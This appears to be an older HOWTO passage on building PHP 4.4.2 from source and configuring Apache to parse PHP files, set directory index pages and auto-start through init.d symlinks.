cd /usr/local/src/php-4.4.2
./configure \
–with-apxs=/usr/local/apache/bin/apxs \
–disable-debug \
–enable-ftp \
–enable-inline-optimization \
–enable-magic-quotes \
–enable-mbstring \
–enable-mm=shared \
–enable-safe-mode \
–enable-track-vars \
–enable-trans-sid \
–enable-wddx=shared \
–enable-xml \
–with-dom \
–with-gd \
–with-gettext \
–with-mysql=/usr/local/mysql \
–with-regex=system \
–with-xml \
–with-zlib-dir=/usr/lib
make && make install
cp php.ini-dist /usr/local/lib/php.ini
I like to keep my config files all together in /etc. I set up a symbolic link like this:
ln -s /usr/local/lib/php.ini /etc/php.ini
Then I can just open /etc/php.ini in my editor to make changes.
Recommended reading on securing your PHP installation is this article at SecurityFocus.com.
I like to keep all my configuration files together in /etc, so I set up a symbolic link from the actual location to /etc:
ln -s /usr/local/apache/conf/httpd.conf /etc/httpd.conf
Now open /etc/httpd.conf in your favorite text editor, and set all the basic Apache options in accordance with the official Apache instructions (beyond the scope of this HOWTO).
Also recommended is the article on securing Apache.
To ensure your PHP files are properly interpreted, and not just downloaded as text files, remove the # at the beginning of the lines which read:
#AddType application/x-httpd-php-source .phps
If the AddType lines above don’t exist, manually enter them (without the leading # of course) after the line
AddType application/x-tar .tgz
or anyplace within the <IfModule mod_mime.c> section of httpd.conf.
If you wish to use other/additional extensions/filetypes for your PHP scripts instead of just .php, add them to the AddType directive:
AddType application/x-httpd-php .php .foo
AddType application/x-httpd-php-source .phps .phtmls
An example: if you wanted every single HTML page to be parsed and processed like a PHP script, just add .htm and .html:
AddType application/x-httpd-php .php .htm .html
There will be a bit of a performance loss if every single HTML page is being checked for PHP code even if it doesn’t contain any. But if you want to use PHP but be “stealthy” about it, you can use this trick.
Add index.php to the list of valid Directory Index files so that your “default page” in a directory can be named index.php.
<IfModule mod_dir.c>
DirectoryIndex index.php index.htm index.html
</IfModule>
You can add anything else you want here too. If you want foobar.baz to be a valid directory index page, just add the .baz filetype to the AddType line, and add foobar.baz to the DirectoryIndex line.
Start Apache
We want to set Apache up with a normal start/stop script in /etc/rc.d/init.d so it can be auto-started and controlled like other system daemons. Set up a symbolic link for the apachectl utility (installed automatically as part of Apache):
ln -s /usr/local/apache/bin/apachectl /etc/rc.d/init.d/apache
Then set up auto-start for runlevel 3 (where the server will go by default):
ln -s /etc/rc.d/init.d/apache /etc/rc.d/rc3.d/S90apache
Then start the daemon:
/etc/rc.d/init.d/apache start
You can check that it’s running properly by doing:
ps -ef
and look for the httpd processes.
